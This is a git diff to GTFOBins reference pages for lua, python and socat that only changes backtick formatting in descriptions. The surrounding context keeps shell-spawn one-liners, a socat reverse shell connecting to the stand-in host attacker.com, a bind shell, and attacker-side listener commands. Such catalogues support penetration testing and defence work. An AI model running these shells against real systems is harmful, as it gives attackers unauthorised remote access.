diff --git a/_gtfobins/lua.md b/_gtfobins/lua.md index 7e4d9a1..4830413 100644 --- a/_gtfobins/lua.md +++ b/_gtfobins/lua.md @@ -3,7 +3,7 @@ functions: execute-interactive: - code: lua -e 'os.execute("/bin/sh")' reverse-shell-non-interactive: - - description: Run nc -l -p 12345 on the attacker box to receive the shell. This requires `lua-socket` installed. + - description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed. code: | export RHOST=attacker.com export RPORT=12345 diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md index 6f7aa79..28c27e6 100644 --- a/_gtfobins/python2.md +++ b/_gtfobins/python2.md @@ -3,7 +3,7 @@ functions: execute-interactive: - code: python2 -c 'import os; os.system("/bin/sh")' reverse-shell-interactive: - - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. + - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md index 469a231..960d00c 100644 --- a/_gtfobins/python3.md +++ b/_gtfobins/python3.md @@ -3,7 +3,7 @@ functions: execute-interactive: - code: python3 -c 'import os; os.system("/bin/sh")' reverse-shell-interactive: - - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. + - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md index 2e84b46..9ea1c3e 100644 --- a/_gtfobins/socat.md +++ b/_gtfobins/socat.md @@ -1,13 +1,13 @@ --- functions: reverse-shell-interactive: - - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. + - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | RHOST=attacker.com RPORT=12345 socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane bind-shell-interactive: - - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 on the attacker box to connect to the shell. + - description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell. code: | LPORT=12345 socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane